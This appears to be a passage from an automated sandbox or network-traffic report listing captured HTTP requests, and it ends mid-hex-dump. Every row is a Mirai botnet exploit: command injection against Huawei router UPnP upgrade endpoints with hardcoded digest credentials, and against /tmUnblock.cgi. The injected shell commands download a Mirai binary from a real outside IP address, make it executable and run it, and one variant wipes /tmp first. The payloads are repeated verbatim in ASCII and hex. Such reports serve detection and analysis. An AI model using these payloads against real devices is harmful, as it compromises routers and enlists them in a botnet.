| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 